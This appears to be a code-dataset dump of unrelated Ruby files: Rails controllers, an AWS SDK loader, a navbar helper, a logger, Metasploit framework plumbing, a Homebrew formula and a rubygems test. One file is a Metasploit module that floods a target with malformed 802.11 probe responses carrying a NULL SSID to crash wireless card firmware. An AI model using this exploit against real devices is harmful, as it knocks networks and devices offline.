@last_timestamp = Time.parse(last_timestamp)
@reason = reason
@message = message.tr("\n", '')
@count = count.to_i
end
def seen_since?(time)
time.to_i <= @last_timestamp.to_i
end
def to_s
"#{@reason}: #{@message} (#{@count} events)"
end
end
def global?
self.class::GLOBAL
end
private
def validate_timeout_annotation
return if timeout_annotation.nil?
override = DurationParser.new(timeout_annotation).parse!
if override <= 0
@validation_errors << "#{TIMEOUT_OVERRIDE_ANNOTATION} annotation is invalid: Value must be greater than 0"
elsif override > 24.hours
@validation_errors << "#{TIMEOUT_OVERRIDE_ANNOTATION} annotation is invalid: Value must be less than 24h"
end
rescue DurationParser::ParsingError => e
@validation_errors << "#{TIMEOUT_OVERRIDE_ANNOTATION} annotation is invalid: #{e}"
end
def timeout_annotation
@definition.dig("metadata", "annotations", TIMEOUT_OVERRIDE_ANNOTATION)
end
def file
@file ||= create_definition_tempfile
end
def create_definition_tempfile
file = Tempfile.new(["#{type}-#{name}", ".yml"])
file.write(YAML.dump(@definition))
file
ensure
file&.close
end
def supports_logs?
respond_to?(:fetch_logs)
end
def statsd_tags
status = if deploy_failed?
"failure"
elsif deploy_timed_out?
"timeout"
elsif deploy_succeeded?
"success"
else
"unknown"
end
tags = %W(context:#{context} namespace:#{namespace} resource:#{id}
type:#{type} sha:#{ENV['REVISION']} status:#{status})
tags | @optional_statsd_tags
end
end
end
| 32.267352 | 147 | 0.63942 |
ab75d3b12acf3aa95b5bf6fc571a3f4d658e44f0 | 1,568 | # frozen_string_literal: true
class Member::RegistrationsController < Devise::RegistrationsController
# before_action :configure_sign_up_params, only: [:create]
# before_action :configure_account_update_params, only: [:update]
# GET /resource/sign_up
# def new
# super
# end
# POST /resource
# def create
# super
# end
# GET /resource/edit
# def edit
# super
# end
# PUT /resource
# def update
# super
# end
# DELETE /resource
# def destroy
# super
# end
# GET /resource/cancel
# Forces the session data which is usually expired after sign
# in to be expired now. This is useful if the user wants to
# cancel oauth signing in/up in the middle of the process,
# removing all OAuth session data.
# def cancel
# super
# end
# protected
# If you have extra params to permit, append them to the sanitizer.
# def configure_sign_up_params
# devise_parameter_sanitizer.permit(:sign_up, keys: [:attribute])
# end
# If you have extra params to permit, append them to the sanitizer.
# def configure_account_update_params
# devise_parameter_sanitizer.permit(:account_update, keys: [:attribute])
# end
# The path used after sign up.
# def after_sign_up_path_for(resource)
# super(resource)
# end
# The path used after sign up for inactive accounts.
# def after_inactive_sign_up_path_for(resource)
# super(resource)
# end
def icon
icon = Icon.find(params[:id])
send_data icon.content, :filename => icon.name, :type => icon.content_type
end
end
| 23.402985 | 78 | 0.695153 |
b90b5734c0687cec9088be3c14049b5a675ef0b6 | 2,440 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sigv4'
require 'aws-sdk-core'
require_relative 'aws-sdk-rds/types'
require_relative 'aws-sdk-rds/client_api'
require_relative 'aws-sdk-rds/client'
require_relative 'aws-sdk-rds/errors'
require_relative 'aws-sdk-rds/waiters'
require_relative 'aws-sdk-rds/resource'
require_relative 'aws-sdk-rds/account_quota'
require_relative 'aws-sdk-rds/certificate'
require_relative 'aws-sdk-rds/db_cluster'
require_relative 'aws-sdk-rds/db_cluster_parameter_group'
require_relative 'aws-sdk-rds/db_cluster_snapshot'
require_relative 'aws-sdk-rds/db_engine'
require_relative 'aws-sdk-rds/db_engine_version'
require_relative 'aws-sdk-rds/db_instance'
require_relative 'aws-sdk-rds/db_log_file'
require_relative 'aws-sdk-rds/db_parameter_group'
require_relative 'aws-sdk-rds/db_parameter_group_family'
require_relative 'aws-sdk-rds/db_security_group'
require_relative 'aws-sdk-rds/db_snapshot'
require_relative 'aws-sdk-rds/db_snapshot_attribute'
require_relative 'aws-sdk-rds/db_subnet_group'
require_relative 'aws-sdk-rds/event_category_map'
require_relative 'aws-sdk-rds/event'
require_relative 'aws-sdk-rds/event_subscription'
require_relative 'aws-sdk-rds/option_group'
require_relative 'aws-sdk-rds/option_group_option'
require_relative 'aws-sdk-rds/parameter'
require_relative 'aws-sdk-rds/pending_maintenance_action'
require_relative 'aws-sdk-rds/reserved_db_instance'
require_relative 'aws-sdk-rds/reserved_db_instances_offering'
require_relative 'aws-sdk-rds/resource_pending_maintenance_action_list'
require_relative 'aws-sdk-rds/customizations'
# This module provides support for Amazon Relational Database Service. This module is available in the
# `aws-sdk-rds` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from Amazon Relational Database Service all
# extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::RDS::Errors::ServiceError
# # rescues all service API errors
# end
#
# See {Errors} for more information.
#
# @service
module Aws::RDS
GEM_VERSION = '1.18.0'
end
| 32.972973 | 102 | 0.80082 |
d54a8a032e58c50639eb8970234a2a222920e254 | 2,297 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response',
'Description' => %q{
This module exploits a firmware-level vulnerability in a variety of
802.11b devices. This attack works by sending a probe response frame
containing a NULL SSID information element to an affected device. This
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
Orinoco, and the first generation of Airport cards).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'],
['WVE', '2006-0064']
]
))
register_options(
[
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
], self.class)
end
def run
open_wifi
cnt = datastore['COUNT'].to_i
print_status("Creating malicious probe response frame...")
frame = create_frame()
print_status("Sending #{cnt} frames...")
cnt.times { wifi.write(frame) }
end
def create_frame
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
caps = [rand(65535)].pack('n')
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) + # capabilities
[0, 0].pack('CC') # Type=SSID(0) Length=0
return frame
end
end
| 29.831169 | 83 | 0.566391 |
edb9dc8ad91e86903ab76b023f8eb6e526c0c3fd | 2,980 | # frozen_string_literal: true
module Import
module GitlabProjects
class CreateProjectFromRemoteFileService < CreateProjectFromUploadedFileService
FILE_SIZE_LIMIT = 10.gigabytes
ALLOWED_CONTENT_TYPES = [
'application/gzip', # most common content-type when fetching a tar.gz
'application/x-tar' # aws-s3 uses x-tar for tar.gz files
].freeze
validate :valid_remote_import_url?
validate :validate_file_size
validate :validate_content_type
private
def required_params
[:path, :namespace, :remote_import_url]
end
def project_params
super
.except(:file)
.merge(import_export_upload: ::ImportExportUpload.new(
remote_import_url: params[:remote_import_url]
))
end
def valid_remote_import_url?
::Gitlab::UrlBlocker.validate!(
params[:remote_import_url],
allow_localhost: allow_local_requests?,
allow_local_network: allow_local_requests?,
schemes: %w(http https)
)
true
rescue ::Gitlab::UrlBlocker::BlockedUrlError => e
errors.add(:base, e.message)
false
end
def allow_local_requests?
::Gitlab::CurrentSettings.allow_local_requests_from_web_hooks_and_services?
end
def validate_content_type
# AWS-S3 presigned URLs don't respond to HTTP HEAD requests,
# so file type cannot be validated
# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/75170#note_748059103
return if amazon_s3?
if headers['content-type'].blank?
errors.add(:base, "Missing 'ContentType' header")
elsif !ALLOWED_CONTENT_TYPES.include?(headers['content-type'])
errors.add(:base, "Remote file content type '%{content_type}' not allowed. (Allowed content types: %{allowed})" % {
content_type: headers['content-type'],
allowed: ALLOWED_CONTENT_TYPES.join(', ')
})
end
end
def validate_file_size
# AWS-S3 presigned URLs don't respond to HTTP HEAD requests,
# so file size cannot be validated
# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/75170#note_748059103
return if amazon_s3?
if headers['content-length'].to_i == 0
errors.add(:base, "Missing 'ContentLength' header")
elsif headers['content-length'].to_i > FILE_SIZE_LIMIT
errors.add(:base, 'Remote file larger than limit. (limit %{limit})' % {
limit: ActiveSupport::NumberHelper.number_to_human_size(FILE_SIZE_LIMIT)
})
end
end
def amazon_s3?
headers['Server'] == 'AmazonS3' && headers['x-amz-request-id'].present?
end
def headers
return {} if params[:remote_import_url].blank? || !valid_remote_import_url?
@headers ||= Gitlab::HTTP.head(params[:remote_import_url]).headers
end
end
end
end
| 32.391304 | 125 | 0.641946 |
287da781e283b466ed96244c117ecb13afc0228d | 481 | module Calagator
class Event < ActiveRecord::Base
class SearchEngine
cattr_accessor(:kind) { :sql }
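      # Dispatches searches to the engine selected via `use` (:sql by default)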
def self.search(*args)
search_engine.search(*args)
end
def self.use(kind)
self.kind = kind
search_engine.configure if search_engine.respond_to?(:configure)
end
def self.score?
search_engine.score?
end
      def self.search_engine
        kind == :sunspot ? ApacheSunspot : Sql
      end
      private_class_method :search_engine
end
end
end
| 16.586207 | 70 | 0.663202 |
e98733c82dda6de3325093b3ab6b7298a4c0aaf9 | 361 | require "spec_helper"
describe OpenXml::Pptx::Properties::NonVisualConnectionShapeDrawingProperties do
include PropertyTestMacros
it_should_use tag: :cNvCxnSpPr, name: "non_visual_connection_shape_drawing_properties"
it_should_have_properties :connection_shape_locks, :connection_start,
:connection_end, :extension_list
end
| 32.818182 | 88 | 0.789474 |
0380947218886f3164d7aff69f4058c2ecdda686 | 11,836 | # frozen_string_literal: true
class RegistrationsController < Devise::RegistrationsController
prepend Dmpopidor::Controllers::Registrations
include OrgSelectable
def edit
@user = current_user
@prefs = @user.get_preferences(:email)
@languages = Language.sorted_by_abbreviation
@orgs = Org.order("name")
@other_organisations = Org.where(is_other: true).pluck(:id)
@identifier_schemes = IdentifierScheme.for_users.order(:name)
@default_org = current_user.org
if !@prefs
flash[:alert] = "No default preferences found (should be in branding.yml)."
end
end
# GET /resource
def new
oauth = { provider: nil, uid: nil }
IdentifierScheme.for_users.each do |scheme|
unless session["devise.#{scheme.name.downcase}_data"].nil?
oauth = session["devise.#{scheme.name.downcase}_data"]
end
end
@user = User.new
unless oauth.nil?
# The OAuth provider could not be determined or there was no unique UID!
if !oauth["provider"].nil? && !oauth["uid"].nil?
# Connect the new user with the identifier sent back by the OAuth provider
# rubocop:disable Metrics/LineLength
flash[:notice] = _("Please make a choice below. After linking your details to a %{application_name} account, you will be able to sign in directly with your institutional credentials.") % {
application_name: Rails.configuration.branding[:application][:name]
}
end
end
end
# POST /resource
def create
oauth = { provider: nil, uid: nil }
IdentifierScheme.for_users.each do |scheme|
unless session["devise.#{scheme.name.downcase}_data"].nil?
oauth = session["devise.#{scheme.name.downcase}_data"]
end
end
if params[:user][:accept_terms].to_s == "0"
redirect_to after_sign_up_error_path_for(resource),
alert: _("You must accept the terms and conditions to register.")
elsif params[:user][:org_id].blank?
# rubocop:disable Metrics/LineLength
redirect_to after_sign_up_error_path_for(resource),
alert: _("Please select an organisation from the list, or enter your organisation's name.")
# rubocop:enable Metrics/LineLength
else
existing_user = User.where_case_insensitive("email", sign_up_params[:email]).first
if existing_user.present?
if existing_user.invitation_token.present? && !existing_user.accept_terms?
# Destroys the existing user since the accept terms are nil/false. and they
# have an invitation Note any existing role for that user will be deleted too.
# Added to accommodate issue at: https://github.com/DMPRoadmap/roadmap/issues/322
# when invited user creates an account outside the invite workflow
existing_user.destroy
else
redirect_to after_sign_up_error_path_for(resource),
alert: _("That email address is already registered.")
return
end
end
# Handle the Org selection
attrs = sign_up_params
attrs = handle_org(attrs: attrs)
build_resource(attrs)
# Determine if reCAPTCHA is enabled and if so verify it
use_recaptcha = Rails.configuration.branding[:application][:use_recaptcha] || false
if (!use_recaptcha || verify_recaptcha(model: resource)) && resource.save
if resource.active_for_authentication?
set_flash_message :notice, :signed_up if is_navigational_format?
sign_up(resource_name, resource)
UserMailer.welcome_notification(current_user).deliver_now
unless oauth.nil?
# The OAuth provider could not be determined or there was no unique UID!
unless oauth["provider"].nil? || oauth["uid"].nil?
prov = IdentifierScheme.find_by(name: oauth["provider"].downcase)
# Until we enable ORCID signups
if prov.present? && prov.name == "shibboleth"
Identifier.create(identifier_scheme: prov,
value: oauth["uid"],
attrs: oauth,
identifiable: resource)
# rubocop:disable Metrics/LineLength
flash[:notice] = _("Welcome! You have signed up successfully with your institutional credentials. You will now be able to access your account with them.")
# rubocop:enable Metrics/LineLength
end
end
end
respond_with resource, location: after_sign_up_path_for(resource)
else
if is_navigational_format?
set_flash_message :notice, :"signed_up_but_#{resource.inactive_message}"
respond_with resource, location: after_inactive_sign_up_path_for(resource)
end
end
else
clean_up_passwords resource
# rubocop:disable Metrics/LineLength
redirect_to after_sign_up_error_path_for(resource),
alert: _("Unable to create your account.#{errors_for_display(resource)}")
# rubocop:enable Metrics/LineLength
end
end
end
def update
if user_signed_in? then
@prefs = @user.get_preferences(:email)
@orgs = Org.order("name")
@default_org = current_user.org
@other_organisations = Org.where(is_other: true).pluck(:id)
@identifier_schemes = IdentifierScheme.for_users.order(:name)
@languages = Language.sorted_by_abbreviation
if params[:skip_personal_details] == "true"
do_update_password(current_user, params)
else
do_update(require_password = needs_password?(current_user, params))
end
else
render(file: File.join(Rails.root, "public/403.html"), status: 403, layout: false)
end
end
private
# check if we need password to update user data
# ie if password or email was changed
# extend this as needed
def needs_password?(user, params)
user.email != params[:user][:email] || params[:user][:password].present?
end
def do_update(require_password = true, confirm = false)
mandatory_params = true
# added to by below, overwritten otherwise
message = _("Save Unsuccessful. ")
# ensure that the required fields are present
if params[:user][:email].blank?
message += _("Please enter an email address. ")
mandatory_params &&= false
end
if params[:user][:firstname].blank?
message += _("Please enter a First name. ")
mandatory_params &&= false
end
if params[:user][:surname].blank?
message += _("Please enter a Last name. ")
mandatory_params &&= false
end
if params[:user][:org_id].blank? && params[:user][:other_organisation].blank?
# rubocop:disable Metrics/LineLength
message += _("Please select an organisation from the list, or enter your organisation's name.")
# rubocop:enable Metrics/LineLength
mandatory_params &&= false
end
# has the user entered all the details
if mandatory_params
# Handle the Org selection
attrs = update_params
attrs = handle_org(attrs: attrs)
# user is changing email or password
if require_password
# if user is changing email
if current_user.email != attrs[:email]
# password needs to be present
if params[:user][:password].blank?
message = _("Please enter your password to change email address.")
successfully_updated = false
else
successfully_updated = current_user.update_with_password(attrs)
if !successfully_updated
message = _("Save unsuccessful. \
That email address is already registered. \
You must enter a unique email address.")
end
end
else
# This case is never reached since this method when called with
# require_password = true is because the email changed.
# The case for password changed goes to do_update_password instead
successfully_updated = current_user.update_without_password(attrs)
end
else
# password not required
successfully_updated = current_user.update_without_password(attrs)
end
else
successfully_updated = false
end
# unlink shibboleth from user's details
if params[:unlink_flag] == "true" then
current_user.update_attributes(shibboleth_id: "")
end
# render the correct page
if successfully_updated
if confirm
# will error out if confirmable is turned off in user model
current_user.skip_confirmation!
current_user.save!
end
session[:locale] = current_user.get_locale unless current_user.get_locale.nil?
# Method defined at controllers/application_controller.rb
set_gettext_locale
set_flash_message :notice, success_message(current_user, _("saved"))
# Sign in the user bypassing validation in case his password changed
sign_in current_user, bypass: true
redirect_to "#{edit_user_registration_path}\#personal-details",
notice: success_message(current_user, _("saved"))
else
flash[:alert] = message.blank? ? failure_message(current_user, _("save")) : message
render "edit"
end
end
def do_update_password(current_user, params)
if params[:user][:current_password].blank?
message = _("Please enter your current password")
elsif params[:user][:password_confirmation].blank?
message = _("Please enter a password confirmation")
elsif params[:user][:password] != params[:user][:password_confirmation]
message = _("Password and comfirmation must match")
else
successfully_updated = current_user.update_with_password(password_update)
end
# render the correct page
if successfully_updated
session[:locale] = current_user.get_locale unless current_user.get_locale.nil?
      # Method defined at controllers/application_controller.rb
      set_gettext_locale
set_flash_message :notice, success_message(current_user, _("saved"))
# TODO this method is deprecated
sign_in current_user, bypass: true
redirect_to "#{edit_user_registration_path}\#password-details",
notice: success_message(current_user, _("saved"))
else
flash[:alert] = message.blank? ? failure_message(current_user, _("save")) : message
redirect_to "#{edit_user_registration_path}\#password-details"
end
end
def sign_up_params
params.require(:user).permit(:email, :password, :password_confirmation,
:firstname, :surname, :recovery_email,
:accept_terms, :org_id, :org_name,
:org_crosswalk)
end
def update_params
params.require(:user).permit(:firstname, :org_id, :language_id,
:surname, :department_id, :org_id,
:org_name, :org_crosswalk)
end
def password_update
params.require(:user).permit(:email, :firstname, :current_password,
:language_id, :password,
:password_confirmation, :surname,
:department_id, :org_id, :org_name,
:org_crosswalk)
end
# Finds or creates the selected org and then returns it's id
def handle_org(attrs:)
return attrs unless attrs.present? && attrs[:org_id].present?
org = org_from_params(params_in: attrs, allow_create: true)
# Remove the extraneous Org Selector hidden fields
attrs = remove_org_selection_params(params_in: attrs)
return attrs unless org.present?
# reattach the org_id but with the Org id instead of the hash
attrs[:org_id] = org.id
attrs
end
end
| 39.192053 | 196 | 0.657063 |
1aafff502d39a904d6e51020e3cad8009e6f553d | 659 | require 'spec_helper'
require 'fetchers/service_binding_create_fetcher'
module VCAP::CloudController
RSpec.describe ServiceBindingCreateFetcher do
describe '#fetch' do
let(:app_model) { AppModel.make(name: 'my-app') }
let(:service_instance) { ServiceInstance.make(name: 'my-service', space_guid: app_model.space.guid) }
it 'returns the app and service instance' do
fetched_app, fetched_instance = ServiceBindingCreateFetcher.new.fetch(app_model.guid, service_instance.guid)
expect(fetched_app.name).to eq(app_model.name)
expect(fetched_instance.name).to eq(service_instance.name)
end
end
end
end
| 34.684211 | 116 | 0.738998 |
ed5e877706c780e939836591642568e22da5884b | 1,086 | module Fog
class Logger
@channels = {
:deprecation => ::STDERR,
:warning => ::STDERR
}
@channels[:debug] = ::STDERR if ENV["DEBUG"]
def self.[](channel)
@channels[channel]
end
def self.[]=(channel, value)
@channels[channel] = value
end
def self.debug(message)
write(:debug, "[light_black][fog][DEBUG] #{message}[/]\n")
end
def self.deprecation(message)
write(:deprecation, "[yellow][fog][DEPRECATION] #{message}[/]\n")
end
def self.warning(message)
write(:warning, "[yellow][fog][WARNING] #{message}[/]\n")
end
def self.write(key, value)
channel = @channels[key]
if channel
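        # Render Formatador markup as ANSI escapes when writing to a TTY; strip it otherwise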
message = if channel.tty?
value.gsub(::Formatador::PARSE_REGEX) { "\e[#{::Formatador::STYLES[$1.to_sym]}m" }.gsub(::Formatador::INDENT_REGEX, "")
else
value.gsub(::Formatador::PARSE_REGEX, "").gsub(::Formatador::INDENT_REGEX, "")
end
channel.write(message)
end
nil
end
end
end
| 24.681818 | 139 | 0.548803 |
1a1e679394f238263b7699ff52dd89587206833e | 1,563 | OnoBurrito::Application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Do not eager load code on boot. This avoids loading your whole application
# just for the purpose of running a single test. If you are using a tool that
# preloads Rails for running tests, you may have to set it to true.
config.eager_load = false
# Configure static asset server for tests with Cache-Control for performance.
config.serve_static_assets = true
config.static_cache_control = "public, max-age=3600"
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates.
config.action_dispatch.show_exceptions = true
# Disable request forgery protection in test environment.
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
# Print deprecation notices to the stderr.
config.active_support.deprecation = :stderr
end
| 42.243243 | 85 | 0.774792 |
b99e9daf4fb46d7f7522264bbc351db75f993269 | 2,340 | module ApplicationHelper
module Navbar
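    # Serializes the menu for the given placement into an array of nested item hashes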
def menu_to_json(placement = :default)
Menu::Manager.menu(placement).map do |menu_section|
item_to_hash(menu_section) if menu_section.visible?
end.compact
end
def item_to_hash(item)
{
:id => item.id.to_s,
:title => item.name,
:icon => item.icon,
:href => item.href,
:type => item.type,
:visible => item.visible?,
:active => item_active?(item),
:items => item.items.to_a.select(&:visible?).map(&method(:item_to_hash))
}
end
# FIXME: The 'active' below is an active section not an item. That is wrong.
# What works is the "legacy" part that compares @layout to item.id.
# This assumes that these matches -- @layout and item.id. Moving forward we
# need to remove that assumption. However to do that we need figure some way
# to identify the active menu item here.
def item_active?(item)
if item.leaf?
# FIXME: remove @layout condition when every controller sets menu_section properly
active = controller.menu_section_id(controller.params) || @layout.to_sym
item.id.to_sym == active || item.id.to_sym == @layout.to_sym
else
return section_nav_class_iframe(item) if params[:action] == 'iframe'
active = controller.menu_section_id(controller.params) || @layout.to_sym
if item.parent.nil?
# first-level, fallback to old logic for now
# FIXME: exception behavior to remove
active = 'my_tasks' if %w[my_tasks all_tasks].include?(@layout)
active = 'cloud_volume' if @layout == 'cloud_volume_snapshot' || @layout == 'cloud_volume_backup'
active = 'cloud_object_store_container' if @layout == 'cloud_object_store_object'
active = active.to_sym
end
# FIXME: remove to_s, to_sym once all items use symbol ids
item.id.to_sym == active ||
item.contains_item_id?(active.to_s) ||
item.contains_item_id?(active.to_sym)
end
end
# special handling for custom menu sections and items
def section_nav_class_iframe(section)
params[:sid].present? && section.id.to_s == params[:sid] ||
params[:id].present? && section.contains_item_id?(params[:id])
end
end
end
| 39 | 107 | 0.639316 |
1aa2155b6240e407eda8515cfc1375b75ac21bd4 | 2,479 | module SessionsHelper
# Remembers a user in a persistent session.
def remember(user)
user.remember
cookies.permanent.signed[:user_id] = user.id
cookies.permanent[:remember_token] = user.remember_token
end
# Logs in the given user.
def log_in(user)
    #session is a method provided by Rails
    #assign the user id to the session
session[:user_id] = user.id
end
# Returns the current logged-in user (if any).
  # we keep track of the logged-in user via the id stored in the session
  #@current_user = @current_user || User.find_by(id: session[:user_id])
  #if current_user has already been assigned a value, the
  #User.find method is not called again
# >> @foo
# => nil
# >> @foo = @foo || "bar"
# => "bar"
# >> @foo = @foo || "baz"
# => "bar"
#
  # that does not look good, hence the approach below
# if @current_user.nil?
# @current_user = User.find_by(id: session[:user_id])
# else
# @current_user
# end
# def current_user
# if session[:user_id]
# #User.find_by(id: 3) -> wie in der Datenbank die methode
# @current_user ||= User.find_by(id: session[:user_id])
# end
# end
# advanced login
# Returns the user corresponding to the remember token cookie.
def current_user
if (user_id = session[:user_id]) #while setting user_id = session[:user_id]
@current_user ||= User.find_by(id: user_id)
elsif (user_id = cookies.signed[:user_id])
#raise # The tests still pass, so this branch is currently untested.
user = User.find_by(id: user_id)
if user && user.authenticated?(:remember, cookies[:remember_token])
log_in user
@current_user = user
end
end
end
def current_user?(user)
user == current_user
end
# Returns true if the user is logged in, false otherwise.
def logged_in?
!current_user.nil?
end
# Forgets a persistent session.
def forget(user)
user.forget
cookies.delete(:user_id)
cookies.delete(:remember_token)
end
# Logs out the current user.
def log_out
forget(current_user)
session.delete(:user_id)
@current_user = nil
end
# Redirects to stored location (or to the default).
def redirect_back_or(default)
redirect_to(session[:forwarding_url] || default)
session.delete(:forwarding_url)
end
# Stores the URL trying to be accessed.
def store_location
session[:forwarding_url] = request.original_url if request.get?
end
end
| 26.37234 | 80 | 0.670028 |
6122d8e08641e47d9a6f6b5036b844fbf84542d3 | 3,992 | # -*- coding: binary -*-
module Msf
module Simple
###
#
# A simplified post-exploitation module wrapper.
#
###
module Post
include Module
#
# Wraps the post-exploitation module running process in a simple single
# method. The options hash can have the following values passed in it:
#
# OptionStr
#
# A string of comma separated option values that should be imported into
# the datastore.
#
# Options
#
# A hash of values to be imported directly into the datastore.
#
# LocalInput
#
# The local input handle that data can be read in from.
#
# LocalOutput
#
# The local output through which data can be displayed.
#
# RunAsJob
#
# Whether or not the module should be run in the context of a background
# job.
#
def self.run_simple(omod, opts = {}, &block)
# Clone the module to prevent changes to the original instance
mod = omod.replicant
Msf::Simple::Framework.simplify_module( mod, false )
yield(mod) if block_given?
# Import options from the OptionStr or Option hash.
mod._import_extra_options(opts)
# Verify the options
mod.options.validate(mod.datastore)
# Initialize user interaction
if ! opts['Quiet']
mod.init_ui(opts['LocalInput'] || mod.user_input, opts['LocalOutput'] || mod.user_output)
else
mod.init_ui(nil, nil)
end
#
# Disable this until we can test background stuff a little better
#
if(mod.passive? or opts['RunAsJob'])
ctx = [ mod.replicant ]
mod.job_id = mod.framework.jobs.start_bg_job(
"Post: #{mod.refname}",
ctx,
Proc.new { |ctx_| self.job_run_proc(ctx_) },
Proc.new { |ctx_| self.job_cleanup_proc(ctx_) }
)
# Propagate this back to the caller for console mgmt
omod.job_id = mod.job_id
else
ctx = [ mod ]
self.job_run_proc(ctx)
self.job_cleanup_proc(ctx)
end
end
#
# Calls the class method.
#
def run_simple(opts = {}, &block)
Msf::Simple::Post.run_simple(self, opts, &block)
end
protected
#
# Job run proc, sets up the module and kicks it off.
#
# XXX: Mostly Copy/pasted from simple/auxiliary.rb
#
def self.job_run_proc(ctx)
mod = ctx[0]
begin
mod.setup
mod.framework.events.on_module_run(mod)
# Grab the session object since we need to fire an event for not
# only the normal module_run event that all module types have to
# report, but a specific event for sessions as well.
s = mod.framework.sessions.get(mod.datastore["SESSION"])
if s
mod.framework.events.on_session_module_run(s, mod)
mod.run
else
mod.print_error("Session not found")
mod.cleanup
return
end
rescue Msf::Post::Complete
mod.cleanup
return
rescue Msf::Post::Failed => e
mod.error = e
mod.print_error("Post aborted due to failure: #{e.message}")
mod.cleanup
return
rescue ::Timeout::Error => e
mod.error = e
mod.print_error("Post triggered a timeout exception")
mod.cleanup
return
rescue ::Interrupt => e
mod.error = e
mod.print_error("Post interrupted by the console user")
mod.cleanup
return
rescue ::Exception => e
mod.error = e
mod.print_error("Post failed: #{e.class} #{e}")
if(e.class.to_s != 'Msf::OptionValidateError')
mod.print_error("Call stack:")
e.backtrace.each do |line|
break if line =~ /lib.msf.base.simple.post.rb/
mod.print_error(" #{line}")
end
end
elog('Post failed', error: e)
mod.cleanup
return
end
end
#
# Clean up the module after the job completes.
#
# Copy/pasted from simple/auxiliary.rb
#
def self.job_cleanup_proc(ctx)
mod = ctx[0]
mod.framework.events.on_module_complete(mod)
# Allow the exploit to cleanup after itself, that messy bugger.
mod.cleanup
end
end
end
end
| 24.490798 | 95 | 0.633517 |
2140541429637a8bf84048c6568ac9f45c58fa51 | 1,052 | class Mill < Formula
desc "Scala build tool"
homepage "https://com-lihaoyi.github.io/mill/mill/Intro_to_Mill.html"
url "https://github.com/com-lihaoyi/mill/releases/download/0.9.9/0.9.9-assembly"
sha256 "1c84fb6f1304cfb8e94ac62fa2137dfb362ec827ff01113b85de3c60c4e8f7fe"
license "MIT"
livecheck do
url :stable
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
sha256 cellar: :any_skip_relocation, x86_64_linux: "497cf7b1a50b966f535ac16df62ce69ebe05e21a45080f880840f2d10c10b6da" # linuxbrew-core
end
depends_on "openjdk"
def install
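    # The release artifact is a single self-executing assembly; install it under libexec as "mill"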
libexec.install Dir["*"].shift => "mill"
chmod 0555, libexec/"mill"
(bin/"mill").write_env_script libexec/"mill", Language::Java.overridable_java_home_env
end
test do
(testpath/"build.sc").write <<~EOS
import mill._
import mill.scalalib._
object foo extends ScalaModule {
def scalaVersion = "2.12.8"
}
EOS
output = shell_output("#{bin}/mill resolve __.compile")
assert_equal "foo.compile", output.lines.last.chomp
end
end
| 28.432432 | 138 | 0.701521 |
bbee2b193ff35ae6b29a6240daf408dc4cda4ae5 | 114 | class Admin::DashboardController < ApplicationController
before_action :authenticate_user!
def index
end
end
| 16.285714 | 56 | 0.824561 |
6a0238ecfa238195c0758fb260da981f18ca6886 | 1,481 | class UserAgent
module Browsers
class Gecko < Base
def self.extend?(agent)
agent.application && agent.application.product == "Mozilla"
end
GeckoBrowsers = %w(
PaleMoon
Firefox
Camino
Iceweasel
Seamonkey
).freeze
def browser
GeckoBrowsers.detect { |browser| respond_to?(browser) } || super
end
def version
v = send(browser).version
v.nil? ? super : v
end
def platform
if comment = application.comment
if comment[0] == 'compatible' || comment[0] == 'Mobile'
nil
elsif /^Windows / =~ comment[0]
'Windows'
elsif comment.any? { |c| c =~ /Android/ }
'Android'
else
comment[0]
end
end
end
def security
Security[application.comment[1]] || :strong
end
def os
if comment = application.comment
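          # Pick the comment element that carries the OS token (skipping the 'U' security flag when present)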
i = if comment[1] == 'U'
2
elsif /^Windows / =~ comment[0] || /^Android/ =~ comment[0]
0
elsif comment[0] == 'Mobile'
nil
else
1
end
return nil if i.nil?
OperatingSystems.normalize_os(comment[i])
end
end
def localization
if comment = application.comment
comment[3]
end
end
end
end
end
| 21.463768 | 73 | 0.47603 |
61e92bd1dfd6b18ba72e3c429fe1442aeb2e7556 | 5,729 | # frozen_string_literal: true
require 'rubygems/test_case'
require 'rubygems/user_interaction'
require 'timeout'
class TestGemStreamUI < Gem::TestCase
SHORT_TIMEOUT = (defined?(RubyVM::MJIT) && RubyVM::MJIT.enabled?) ? 1.0 : 0.1 # increase timeout with MJIT for --jit-wait testing
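  # Lets the StringIO test streams report (or fake) whether they are a terminal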
module IsTty
attr_accessor :tty
def tty?
@tty = true unless defined? @tty
return @tty
end
alias_method :isatty, :tty?
def noecho
yield self
end
end
def setup
super
@cfg = Gem.configuration
@in = StringIO.new
@out = StringIO.new
@err = StringIO.new
@in.extend IsTty
